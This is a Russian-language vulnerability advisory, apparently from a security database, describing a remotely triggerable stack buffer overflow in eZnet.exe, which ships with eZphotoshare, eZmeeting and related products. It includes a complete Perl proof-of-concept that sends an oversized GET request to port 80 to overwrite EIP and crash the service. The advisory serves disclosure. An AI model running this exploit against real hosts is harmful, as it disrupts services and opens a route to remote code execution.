Дата публикации: | 10.12.2003 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1358 |
Опасность: | Критическая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: eZ 'eZnet.exe'
Описание: Уязвимость обнаружена в нескольких 'eZ' программах, включая eZphotoshare, eZmeeting, eZnetwork, и eZshare. Удаленный пользователь может выполнить произвольный код на целевой системе. Удаленный пользователь может послать специально сформированный пакет к 80 TCP порту, чтобы врывать переполнение буфера в 'eZnet.exe'. Удаленный пользователь может аварийно завершить работу службы или выполнить произвольный код на целевой системе. Пример/Эксплоит: #!/usr/bin/perl -w # Stack Overflow Vulnerability in eZphotoshare - PoC # - by Peter Winter-Smith [peter4020@hotmail.com] use IO::Socket; if(!($ARGV[0])) print "Usage: eZstack.pl <victim>\n\n"; exit; print "Stack Overflow PoC\n"; $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0], PeerPort=>"80") or die "Unable to connect to $ARGV[0] on port 80"; $eip = "\x58\x58\x58\x58"; $packet = "" . "GET /SwEzModule.dll?operation=login&autologin=" . "a"x4653 . $eip . "\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n"; print $victim $packet; print " + Making Request ...\n"; sleep(4); close($victim); print "Done.\n"; exit; URL производителя:http://www.ezmeeting.com/Products.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | eZ Multiple Packages Stack Overflow Vulnerability |